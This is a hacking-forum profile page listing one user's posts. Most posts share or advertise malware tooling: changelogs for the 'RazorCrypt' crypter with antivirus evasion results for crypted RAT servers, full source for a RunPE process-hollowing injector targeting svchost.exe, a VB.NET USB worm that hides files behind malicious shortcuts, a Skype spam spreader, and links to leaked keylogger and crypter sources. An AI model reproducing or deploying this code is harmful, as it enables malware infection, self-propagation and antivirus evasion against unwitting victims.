Jump to content

ka0z

Members
  • Posts

    19
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by ka0z

  1. Download: Download RazorCrypt 12.3.rar Update 12.3.0 Changelog: §1 - reFUD §2 - added persistence / anti botkill §3 - added skin-changer §4 - added copy/move file option for the install-feature. §5 - multi format support for binder To §1: I reFUDed the stub, not mutch to say here. To §2: I added startup & process persistence, it is not perfect now, but works pretty good yet. To §3: I added 2 small buttons to change the skin as some don't like the cosmo skin. To §4: You can now choose if the file should be moved or if the file should be copied for the install feature. To §5: All file formats are now supported by the binder. File Info: File Name: test.exe SHA1: d04e45f12b5fd2e3db7de65fc09dcff91ac66bed MD5: 00a79eb770347139fb7ee052b886f173 Date and Time: 1-05-13,08:14:06 Report Generated by LeVeL-23.info File Size: 732508 Bytes Detection: 1 of 35 Detections: AVG Free Clean ArcaVir Clean Avast Clean AntiVir (Avira) Clean BitDefender Clean VirusBuster Internet Security Clean Clam Antivirus Clean COMODO Internet Security Clean Dr.Web Clean eTrust-Vet Clean F-PROT Antivirus Clean F-Secure Internet Security Clean G Data Clean IKARUS Security Clean Kaspersky Antivirus Clean McAfee Clean MS Security Essentials Clean ESET NOD32 Trojan.Win32\/Injector.Autoit.IU Norman Clean Norton Antivirus Clean Panda Security Clean A-Squared Clean Quick Heal Antivirus Clean Solo Antivirus Clean Sophos Clean Trend Micro Internet Security Clean VBA32 Antivirus Clean Zoner AntiVirus Clean Ad-Aware Clean BullGuard Clean Immunet Antivirus Clean K7 Ultimate Clean NANO Antivirus Clean VIPRE Clean
  2. Autor: enzo_ #cs ---------------------------------------------------------------------------- ;Autor: enzo_ ;Linguagem: AutoIt ;Função: Drag and Drop #ce ---------------------------------------------------------------------------- #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <StaticConstants.au3> #include <WindowsConstants.au3> #Region ### START Koda GUI section ### Form= $Form1 = GUICreate("Func Drag File and Drop", 256, 53, -1, -1,-1, $WS_EX_ACCEPTFILES) GUISetOnEvent($GUI_EVENT_DROPPED, "Drag") $Input1 = GUICtrlCreateInput("[ ... ]", 8, 24, 241, 21) GUICtrlSetState(-1, $GUI_DROPACCEPTED) $Label1 = GUICtrlCreateLabel("Arraste o arquivo e solte", 8, 8, 118, 16) GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### Func Drag() ConsoleWrite("ID: "&@GUI_DRAGID & " File: "&@GUI_DRAGFILE &" Drop: "&@GUI_DROPID&@CRLF) EndFunc While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit EndSwitch WEnd
  3. This code shows how to make TEA Encryption by legend90 Func _XXTEA_Encrypt ( $ Data , $ Key ) $ Data = Binary ( $ Data ) Local $ datalen = BinaryLen ( $ Data ) If $ datalen = 0 Then Return "" ElseIf $ datalen < 8 Then $ Datalen = 8 EndIf Local $ Opcode = '' Local $ CodeBuffer = DllStructCreate ( "byte [" & BinaryLen ( $ Opcode ) & "]" ) DllStructSetData ( $ CodeBuffer , 1 , $ Opcode ) Local $ V = DllStructCreate ( "byte [" & Ceiling ( $ datalen / 4 ) * 4 & "]" ) DllStructSetData ( $ V , 1 , $ Data ) Local $ K = DllStructCreate ( "byte [16]" ) DllStructSetData ( $ K , 1 , $ Key ) DllCall ( "user32.dll" , "none" , "CallWindowProc" , "ptr" , DllStructGetPtr ( $ CodeBuffer ) , _ "Ptr" , DllStructGetPtr ( $ V ) , _ "Int" , Ceiling ( $ datalen / 4 ) , _ "Ptr" , DllStructGetPtr ( $ K ) , _ "Int" , 0 ) Local $ Ret = DllStructGetData ( $ V , 1 ) $ CodeBuffer = 0 $ V = 0 $ K = 0 Return $ Ret EndFunc Func _XXTEA_Decrypt ( $ Data , $ Key ) $ Data = Binary ( $ Data ) Local $ datalen = BinaryLen ( $ Data ) If $ datalen = 0 Then Return "" Local $ Opcode = '' Local $ CodeBuffer = DllStructCreate ( "byte [" & BinaryLen ( $ Opcode ) & "]" ) DllStructSetData ( $ CodeBuffer , 1 , $ Opcode ) Local $ V = DllStructCreate ( "byte [" & Ceiling ( $ datalen / 4 ) * 4 & "]" ) DllStructSetData ( $ V , 1 , $ Data ) Local $ K = DllStructCreate ( "byte [16]" ) DllStructSetData ( $ K , 1 , $ Key ) DllCall ( "user32.dll" , "none" , "CallWindowProc" , "ptr" , DllStructGetPtr ( $ CodeBuffer ) , _ "Ptr" , DllStructGetPtr ( $ V ) , _ "Int" , Ceiling ( $ datalen / 4 ) , _ "Ptr" , DllStructGetPtr ( $ K ) , _ "Int" , 0 ) Local $ Ret = DllStructGetData ( $ V , 1 ) $ CodeBuffer = 0 $ V = 0 $ K = 0 Return $ Ret EndFunc
  4. RunExeFromMemory ( Base Function ) Author : M3 Credits : trancexx (trancexx at yahoo dot com) RunExeFromMemory Base Tested on Cybergate \ SpyNet on WIN_XP , WIN_VISTA , WIN_7_32 ;============================================================================== ; RunExeFromMemory ( Base Function ) ; Author : M3 ; Credits : trancexx (trancexx at yahoo dot com) RunExeFromMemory Base ; Tested on Cybergate \ SpyNet on WIN_XP , WIN_VISTA , WIN_7_32 ; Detections : 0 | 35 http://scanner.udtools.net/reporte.php?id=m3py_ubxG ;============================================================================== #include<WINAPI.au3> #include <[Includes]\_ThreadContext.au3> RunBinaryInMemory(FileRead(@DesktopDir & "\Server.exe" ) ) Func RunBinaryInMemory($bBinaryImage) Global $sNTDLL = "ntdll" Global $sKernel32 = "kernel32" Global $sEbx = "Ebx" Global $sValue = 0x00400000 Local $pPointer , $tSTARTUPINFO , $tPROCESS_INFORMATION ,$hProcess , $hThread , $tCONTEXT , $tIMAGE_DOS_HEADER , $tIMAGE_NT_SIGNATURE , _ $tIMAGE_FILE_HEADER , $iNumberOfSections , $iEntryPointNEW , $pOptionalHeaderImageBaseNEW , $iOptionalHeaderSizeOfImageNEW , $pHEADERS_NEW , _ $tIMAGE_SECTION_HEADER, $sCONTEXT , $iSizeOfRawData, $pPointerToRawData, $iVirtualAddress ,$tInput , $iRunFlag , $CONTEXT_FUL $tInput = DllStructCreate("Boolean[" & sReadBytes($bBinaryImage) & "]") DllStructSetData($tInput, 1, $bBinaryImage) $pPointer = DllStructGetPtr($tInput) $tSTARTUPINFO = DllStructCreate("dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;ushort ShowWindow;ushort Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError") $tPROCESS_INFORMATION = DllStructCreate("ptr Process;ptr Thread;dword ProcessId;dword ThreadId") _WinAPI_CreateProcess(@SystemDir & "\svchost.exe", 0 , 0 , 0 , 0 , 4 , 0 , 0 , DllStructGetPtr($tSTARTUPINFO), DllStructGetPtr($tPROCESS_INFORMATION)) $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process") $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread") $tCONTEXT = DllStructCreate("dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]") $iRunFlag = 1 Switch $iRunFlag Case 1 $CONTEXT_FULL = 0x10007 Case 2 $CONTEXT_FULL = 0x100007 Case 3 $CONTEXT_FULL = 0x80027 EndSwitch DllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL) DllCall($sNTDLL, "int", "NtGetContextThread", "ptr", $hThread, "ptr", DllStructGetPtr($tCONTEXT)) $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];ushort BytesOnLastPage;ushort Pages;ushort Relocations;ushort SizeofHeader;ushort MinimumExtra;ushort MaximumExtra;ushort SS;ushort SP;ushort Checksum;ushort IP;ushort CS;ushort Relocation;ushort Overlay;char Reserved[8];ushort OEMIdentifier;ushort OEMInformation;char Reserved2[20];dword AddressOfNewExeHeader", $pPointer) $pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer) $pPointer += 4 $tIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;ushort NumberOfSections;dword TimeDateStamp;dword PointerToSymbolTable;dword NumberOfSymbols;ushort SizeOfOptionalHeader;ushort Characteristics", $pPointer) $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections") $pPointer += 20 $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dword BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapReserve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes" ,$pPointer) $pPointer += 96 $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") $pPointer += 128 $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") $sCONTEXT = DllStructGetData($tCONTEXT, $sEbx) + 8 $hBaseAddress = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBaseAddress") _NtWriteVirtualMemory( $hProcess, $sCONTEXT , $pOptionalHeaderImageBaseNEW, 4, 0) _sUnmapViewOfSection($hProcess, $hBaseAddress) _VirtualAllocEx ( $hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) $pHEADERS_NEW = DllStructGetPtr($tIMAGE_DOS_HEADER) $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") _ProcessMemoryWrite ( $hProcess, $sValue, $pHEADERS_NEW, $iOptionalHeaderSizeOfHeadersNEW) For $i = 1 To $iNumberOfSections $tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;ushort NumberOfRelocations;ushort NumberOfLinenumbers;dword Characteristics", $pPointer) $iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData") $pPointerToRawData = DllStructGetPtr($tIMAGE_DOS_HEADER) + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData") $iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress") _ProcessMemoryWrite( $hProcess, $sValue + $iVirtualAddress, $pPointerToRawData, $iSizeOfRawData) $pPointer += 40 Next DllStructSetData($tCONTEXT, "Eax", $sValue + $iEntryPointNEW) _ThreadSetContext ($hThread, $tCONTEXT) _ThreadResume($hThread) EndFunc Func sReadBytes($Data) Local $Value = BinaryLen($Data) Return $Value EndFunc Func _sUnmapViewOfSection($hProcess, $pAddress) $sRet = DllCall($sNTDLL, "int", "NtUnmap" & "ViewOfSection", "ptr", $hProcess, "ptr", $pAddress) return $sRet EndFunc Func _VirtualAllocEx($hProcess, $pAddress, $iSize) $aCall = DllCall($sKernel32, "ptr", "Virtual" & "AllocEx", "handle", $hProcess, "ptr", $pAddress, "dword_ptr", $iSize, "dword", 0x3000,"dword", 64) Return $aCall EndFunc Func _NtWriteVirtualMemory($hProcess, $lpBaseAddress, $lpBuffer, $nSize, $lpNumberOfBytesWritten) Local $Return $Return = DllCall($sNTDLL, "int", "NtWrite" & "VirtualMemory", "int", $hProcess, "ptr", $lpBaseAddress, "ptr*", $lpBuffer, "int", $nSize, "int", $lpNumberOfBytesWritten) Return $Return EndFunc
  5. Razorcrypt_Update_10.2.2_-_Cracked_Hum.rar - Solidfiles Pass: rstforums.com Autoit Crypter Coded by Razor Updated 3/10/2013 2:26 PM Changelog: §1 - reFUD §2 - fix of the Binder §3 - new encrypting alog §4 - better key-generation §5 - new Icons To §1: I reFUDed the stub, i guess it will stay FUD for more then a week again Smile To §2: I fixed the binder, sorry for the issues, it will work perfect now again! To §3: We use AES_256 now. To §4: The generated keys will be more unique To §5: Some of our icos where detected, so i embedded a new Iconpack (Thanks to Xownage). SpyNet Server Crypted RESULTS: 0/35 AVG Free - ArcaVir - Avast 5 - AntiVir (Avira) - BitDefender - VirusBuster - Clam - COMODO - Dr.Web - eTrust-Vet - F-PROT - F-Secure - G Data - IKARUS - Kaspersky - McAfee - MS Essentials - ESET NOD32 - Norman - Norton - Panda - A-Squared - Quick Heal - Solo - Sophos - Trend Micro - VBA32 - Vexira - Zoner AntiVirus - Ad-Aware - BullGuard - Immunet - K7 Ultimate - NANO - VIPRE - File Name server.exe File Size: 1225933 File MD5: 7dc2b719f015aef6edfbc28308f29d3f File SHA1: 5126116dd315c20d2e186adb8994b1337575f896 Check Time: 2013-03-10 18:22:33 Scan report generated by Scan4You.Net
  6. yeah, good backdoored Comradex.exe = stealer server crypted xD your panel Login
  7. how to use dim o as new usb if you want to spread .....>o.start if you want to clean .....>o.clean credits to njq8 Public Class USB ' bY njq8 Private Off As Boolean = False Dim thread As Threading.Thread = Nothing Public ExeName As String = "viruz.exe" Public Sub Start() If thread Is Nothing Then thread = New Threading.Thread(AddressOf usb, 1) thread.Start() End If End Sub Public Sub clean() Off = True Do Until thread Is Nothing Threading.Thread.CurrentThread.Sleep(1) Loop For Each x As IO.DriveInfo In IO.DriveInfo.GetDrives Try If x.IsReady Then If x.DriveType = IO.DriveType.Removable Or _ x.DriveType = IO.DriveType.CDRom Then If IO.File.Exists(x.Name & ExeName) Then IO.File.SetAttributes(x.Name _ & ExeName, IO.FileAttributes.Normal) IO.File.Delete(x.Name & ExeName) End If For Each xx As String In IO.Directory.GetFiles(x.Name) Try IO.File.SetAttributes(xx, IO.FileAttributes.Normal) If xx.ToLower.EndsWith(".lnk") Then IO.File.Delete(xx) End If Catch ex As Exception End Try Next For Each xx As String In IO.Directory.GetDirectories(x.Name) Try With New IO.DirectoryInfo(xx) .Attributes = IO.FileAttributes.Normal End With Catch ex As Exception End Try Next End If End If Catch ex As Exception End Try Next End Sub Sub usb() Off = False Do Until Off = True For Each x In IO.DriveInfo.GetDrives Try If x.IsReady Then If x.TotalFreeSpace > 0 And x.DriveType = IO.DriveType _ .Removable Or x.DriveType = IO.DriveType.CDRom Then Try If IO.File.Exists(x.Name & ExeName) Then IO.File.SetAttributes(x.Name & ExeName, IO.FileAttributes.Normal) End If IO.File.Copy(Application.ExecutablePath, x.Name & ExeName, True) IO.File.SetAttributes(x.Name & ExeName, IO.FileAttributes.Hidden) For Each xx As String In IO.Directory.GetFiles(x.Name) If IO.Path.GetExtension(xx).ToLower <> ".lnk" And _ xx.ToLower <> x.Name.ToLower & ExeName.ToLower Then IO.File.SetAttributes(xx, IO.FileAttributes.Hidden) IO.File.Delete(x.Name & New IO.FileInfo(xx).Name & ".lnk") With CreateObject("WScript.****************l").CreateShortcut _ (x.Name & New IO.FileInfo(xx).Name & ".lnk") .TargetPath = "cmd.exe" .WorkingDirectory = "" .Arguments = "/c start " & ExeName.Replace(" ", ChrW(34) _ & " " & ChrW(34)) & "&start " & New IO.FileInfo(xx) _ .Name.Replace(" ", ChrW(34) & " " & ChrW(34)) & " & exit" .IconLocation = GetIcon(IO.Path.GetExtension(xx)) .Save() End With End If Next For Each xx As String In IO.Directory.GetDirectories(x.Name) IO.File.SetAttributes(xx, IO.FileAttributes.Hidden) IO.File.Delete(x.Name & New IO.DirectoryInfo(xx).Name & " .lnk") With CreateObject("WScript.****************l") _ .CreateShortcut(x.Name & IO.Path.GetFileNameWithoutExtension(xx) & " .lnk") .TargetPath = "cmd.exe" .WorkingDirectory = "" .Arguments = "/c start " & ExeName.Replace(" ", ChrW(34) _ & " " & ChrW(34)) & "&explorer /root,""%CD%" & New _ IO.DirectoryInfo(xx).Name & """ & exit" .IconLocation = "%SystemRoot%\system32\****************L32.dll,3" '< folder icon .Save() End With Next Catch ex As Exception End Try End If End If Catch ex As Exception End Try Next Threading.Thread.CurrentThread.Sleep(5000) Loop thread = Nothing End Sub Function GetIcon(ByVal ext As String) As String Try Dim r = Microsoft.Win32.Registry _ .LocalMachine.OpenSubKey("Software\Classes\", False) Dim e As String = r.OpenSubKey(r.OpenSubKey(ext, False) _ .GetValue("") & "\DefaultIcon\").GetValue("", "") If e.Contains(",") = False Then e &= ",0" Return e Catch ex As Exception Return "" End Try End Function End Class
  8. Full source code leaked Download Sick Lite Version 9.rar from Sendspace.com - send big files the easy way
  9. Meraba arkada?lar hidden sabotage keylogger serisinin 3. sürümünü biraz degi?tirdim. Win7 Xp Vista Win8 destekli hale getirdim. Bikaç düzenleme yapt?m Source Olarak Veriyorum by Harmmy http://www.sendspace.com/file/80t35o
  10. Please delete all the post from this user, are all bacdoored's Anubis - Analysis Report ionutz15.no-ip.org 79.150.23.133
  11. codedom crypter source Full Crypter By ThIbAhAcK.rar
  12. ''''Credits: Aeonhack, Mavamaarten, Support™.''''' Sykandar Full Theme [vb.net ] - Pastebin.com
  13. '--------------------- [ Theme ] -------------------- 'Creator: Mephobia & Tedd 'Contact: Mephobia.HF (Skype) 'Created: 12.17.2012 'Changed: 12.17.2012 '-------------------- [ /Theme ] --------------------- [VB.NET] ? [Vb.Net] Excision Theme [GDI+] [Clean] [source] ? - Pastebin.com :">
  14. Sub SkypeSpread() If "%SKYPE%" = "True" Then Try Dim g As New StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) & "\s4c.vbs") g.BaseStream.Seek(0, SeekOrigin.End) g.WriteLine("on error resume next") g.WriteLine("set Fruxr = WScript.CreateObject(""Skype4COM.Skype"", ""Skype_"")") g.WriteLine("Fruxr.Client.Start()") g.WriteLine("Fruxr.Attach()") g.WriteLine("For Each KZN In Fruxr.Friends") g.WriteLine("Fruxr.SendMessage KZN.handle,""%IMMESSAGE%""") g.WriteLine("next") g.Close() Dim p As New Process Dim ProcessProperties As New ProcessStartInfo ProcessProperties.FileName = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) & "\s4c.vbs" Dim myProcess As Process = Process.Start(ProcessProperties) myProcess.WaitForExit() Threading.Thread.Sleep(5000) IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) & "\s4c.vbs") Catch ex As Exception MsgBox(ex.ToString) End Try End If End Sub Credits: 176.31.115.28 Coder: Some young kid
  15. deleted report scan = banned
  16. source level-23.biz
  17. ka0z

    Decoder

    credits? SP you only modified style xD = ripped
  18. ka0z

    Decoder

    ripped code, original source code SP
×
×
  • Create New...